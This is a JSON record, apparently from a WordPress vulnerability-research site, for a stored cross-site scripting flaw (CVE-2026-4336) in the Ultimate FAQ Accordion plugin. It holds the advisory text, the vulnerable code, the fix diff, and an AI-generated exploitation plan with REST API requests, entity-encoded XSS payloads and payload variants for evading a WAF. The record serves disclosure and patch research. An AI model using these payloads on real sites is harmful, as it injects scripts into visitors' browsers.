[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3kBRGAb3vM-LDw24Ki7q7ykprlauNPW9BC2GEZDY3-M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"source_links":38},"CVE-2026-4336","ultimate-faq-accordion-plugin-authenticated-author-stored-cross-site-scripting-via-faq-content","Ultimate FAQ Accordion Plugin \u003C= 2.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via FAQ Content","The Ultimate FAQ Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via FAQ content in all versions up to, and including, 2.4.7. This is due to the plugin calling html_entity_decode() on post_content during rendering in the set_display_variables() function (View.FAQ.class.php, line 746), which converts HTML entity-encoded payloads back into executable HTML, combined with insufficient output escaping in the faq-answer.php template where the decoded content is echoed without wp_kses_post() or any other sanitization. The ufaq custom post type is registered with 'show_in_rest' => true and defaults to 'post' capability_type, allowing Author-level users to create and publish FAQs via the REST API. An Author can submit entity-encoded malicious HTML (e.g., <img src=x onerror=alert()>) which bypasses WordPress's kses sanitization at save time (since kses sees entities as plain text, not tags), but is then decoded back into executable HTML by html_entity_decode() at render time. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in FAQ pages that will execute whenever a user accesses an injected FAQ, either directly or via the [ultimate-faqs] shortcode.","ultimate-faqs",null,"\u003C=2.4.7","2.4.8","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-08 14:25:15","2026-04-09 03:25:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5ac3ac02-d496-46cb-9aff-ffeeb8fd80fa?source=api-prod",1,[22,23,24,25,26],"ewd-ufaq-templates\u002Ffaq-answer.php","includes\u002FHelper.class.php","readme.txt","ultimate-faqs.php","views\u002FView.FAQ.class.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-4336 - Ultimate FAQ Accordion Plugin Stored XSS\n\n## 1. Vulnerability Summary\nThe **Ultimate FAQ Accordion Plugin (\u003C= 2.4.7)** is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability arises because the plugin intentionally decodes HTML entities in FAQ content using `html_entity_decode()` during the rendering process in `ewdufaqViewFAQ::set_display_variables()` (located in `views\u002FView.FAQ.class.php`). \n\nBecause WordPress's default `kses` sanitization (applied during post saving) treats HTML entities (like `<script>`) as literal text rather than HTML tags, it allows them to be stored in the database. When the plugin renders the FAQ, it decodes these entities back into executable HTML tags and echoes them in the `faq-answer.php` template without subsequent escaping (like `wp_kses_post()`). Since the `ufaq` custom post type is exposed via the REST API with default post capabilities, an **Author-level user** can exploit this to inject arbitrary scripts.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API `\u002Fwp-json\u002Fwp\u002Fv2\u002Fufaq`\n- **Vulnerable Hook\u002FAction:** `the_content` (indirectly via the plugin's custom rendering logic)\n- **HTTP Parameter:** `content` (within the JSON body of the REST request)\n- **Authentication Required:** Author-level credentials (or any role with `edit_posts` capability for the `ufaq` post type).\n- **Preconditions:** The `ufaq` post type must be registered (default behavior of the plugin).\n\n## 3. Code Flow\n1.  **Entry (Save):** An Author user sends a POST request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fufaq` with a payload containing HTML entities: `{\"title\": \"XSS Test\", \"content\": \"<img src=x onerror=alert(document.domain)>\", \"status\": \"publish\"}`.\n2.  **Sanitization Bypass:** WordPress core receives the content. `kses` sees `<` and `>` as plain text entities, not tags, and allows them to be saved to `wp_posts.post_content`.\n3.  **Processing (Render):** A user views the FAQ page. The plugin initializes `ewdufaqViewFAQ`.\n4.  **Vulnerable Sink 1:** Inside `ewdufaqViewFAQ::set_display_variables()` (approx line 746 in `views\u002FView.FAQ.class.php`), the code performs:\n    ```php\n    $this->faq_answer = html_entity_decode( $this->faq->post->post_content, ENT_QUOTES, 'UTF-8' );\n    ```\n    This converts `<img ... >` back to `\u003Cimg ... >`.\n5.  **Vulnerable Sink 2:** `ewdufaqViewFAQ::print_faq_answer()` finds and includes the template `ewd-ufaq-templates\u002Ffaq-answer.php`.\n6.  **Final Execution:** In `faq-answer.php`:\n    ```php\n    \u003C?php echo $this->faq_answer; ?>\n    ```\n    The decoded, unsanitized HTML is written directly to the response buffer.\n\n## 4. Nonce Acquisition Strategy\nThe WordPress REST API requires a `_wpnonce` header (`X-WP-Nonce`) for authenticated state-changing requests.\n1.  **Step 1:** Log in to WordPress as the Author user.\n2.  **Step 2:** Navigate to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n3.  **Step 3:** Use `browser_eval` to extract the REST nonce from the `wpApiSettings` object globally available in the admin UI:\n    ```javascript\n    browser_eval(\"window.wpApiSettings?.nonce\")\n    ```\n4.  **Verification:** Ensure the returned value is a 10-character alphanumeric string.\n\n## 5. Exploitation Strategy\n### Step 1: Authentication and Nonce Retrieval\nUse the `http_request` tool to log in as an Author and `browser_navigate` \u002F `browser_eval` to grab the REST nonce as described in Section 4.\n\n### Step 2: Create Malicious FAQ via REST API\nSubmit the XSS payload encoded as entities.\n\n- **Method:** POST\n- **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fufaq`\n- **Headers:**\n  - `Content-Type: application\u002Fjson`\n  - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body:**\n```json\n{\n  \"title\": \"Security FAQ\",\n  \"content\": \"This is a normal answer. <img src=x onerror=alert(document.domain)>\",\n  \"status\": \"publish\"\n}\n```\n\n### Step 3: Trigger XSS\n- **URL:** Access the `link` provided in the REST API response (the permalink of the new `ufaq` post).\n- **Alternative:** Create a standard page with the shortcode `[ultimate-faqs]` and navigate to it.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password123\n    ```\n2.  **Plugin Configuration:** Ensure the plugin is active.\n    ```bash\n    wp plugin activate ultimate-faqs\n    ```\n\n## 7. Expected Results\n- The REST API should return `201 Created`.\n- When navigating to the FAQ permalink, the HTML source should contain `\u003Cimg src=x onerror=alert(document.domain)>` instead of the encoded `<` entities.\n- A JavaScript `alert` dialog should appear in the browser.\n\n## 8. Verification Steps\n1.  **Database Check:** Verify the content is stored in entity form (safe).\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_type='ufaq' ORDER BY ID DESC LIMIT 1\"\n    ```\n    *Expected output:* Contains `<img ... >`\n2.  **Frontend Check:** Use `http_request` to fetch the FAQ page and grep for the decoded tag.\n    ```bash\n    # (Pseudocode for agent)\n    response = http_request(URL_OF_FAQ)\n    if \"\u003Cimg src=x onerror=alert(document.domain)>\" in response.body:\n        print(\"Vulnerability Confirmed: Entities decoded and rendered raw.\")\n    ```\n\n## 9. Alternative Approaches\n- **Gutenberg Block:** If the REST API is restricted, try creating the post via the Gutenberg editor (which also uses the REST API internally) using `browser_click` and `browser_type`.\n- **Shortcode Attribute:** If the `post_content` vector is patched, check if FAQ attributes (like categories or tags) are also passed through `html_entity_decode` in `set_display_variables()`.\n- **Payload Variety:** If `onerror` is blocked by a WAF, use `\u003Cdetails open ontoggle=alert(1)>` or `\u003Csvg onload=alert(1)>`. Because the sink is a literal `html_entity_decode`, any entity-encoded tag will bypass the initial save-time filter.","The Ultimate FAQ Accordion plugin is vulnerable to Stored Cross-Site Scripting because it decodes HTML entities in FAQ content using `html_entity_decode()` during the rendering process without subsequent sanitization. An Author-level user can submit a payload with entity-encoded HTML (e.g., `<script>`) via the WordPress REST API, which bypasses initial sanitization and is executed when the FAQ is viewed.","\u002F* views\u002FView.FAQ.class.php line 746 *\u002F\n$this->faq_answer = html_entity_decode( $this->faq->post->post_content, ENT_QUOTES, 'UTF-8' );\n\n---\n\n\u002F* ewd-ufaq-templates\u002Ffaq-answer.php *\u002F\n\u003Cdiv class='ewd-ufaq-post-margin ewd-ufaq-faq-post'>\n\t\u003C?php echo $this->faq_answer; \u002F* sanitized by the_content filter *\u002F ?>\n\u003C\u002Fdiv>","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-faqs\u002F2.4.7\u002Fewd-ufaq-templates\u002Ffaq-answer.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-faqs\u002F2.4.8\u002Fewd-ufaq-templates\u002Ffaq-answer.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-faqs\u002F2.4.7\u002Fewd-ufaq-templates\u002Ffaq-answer.php\t2026-02-03 15:49:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fultimate-faqs\u002F2.4.8\u002Fewd-ufaq-templates\u002Ffaq-answer.php\t2026-03-26 18:51:58.000000000 +0000\n@@ -1,3 +1,3 @@\n \u003Cdiv class='ewd-ufaq-post-margin ewd-ufaq-faq-post'>\n-\t\u003C?php echo $this->faq_answer; \u002F* sanitized by the_content filter *\u002F ?>\n+\t\u003C?php echo wp_kses( $this->faq_answer, $this->get_faq_allowed_tags() ); ?>\n \u003C\u002Fdiv>","1. Authenticate as an Author-level user.\n2. Obtain a valid REST API nonce (X-WP-Nonce) from the WordPress admin dashboard (e.g., from the `wpApiSettings` object).\n3. Send a POST request to the `\u002Fwp-json\u002Fwp\u002Fv2\u002Fufaq` endpoint to create a new FAQ.\n4. Include a payload in the `content` field that uses HTML entities to hide malicious tags (e.g., `<img src=x onerror=alert(1)>`).\n5. WordPress core kses sanitization will allow the content because the entities are treated as literal text.\n6. Navigate to the permalink of the newly created FAQ or view it on a page containing the `[ultimate-faqs]` shortcode.\n7. The plugin will decode the entities into executable HTML tags and render them, triggering the XSS payload.","gemini-3-flash-preview","2026-04-16 16:27:29","2026-04-16 16:27:47",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","2.4.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-faqs\u002Ftags\u002F2.4.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-faqs.2.4.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-faqs\u002Ftags\u002F2.4.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fultimate-faqs.2.4.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fultimate-faqs\u002Ftags"]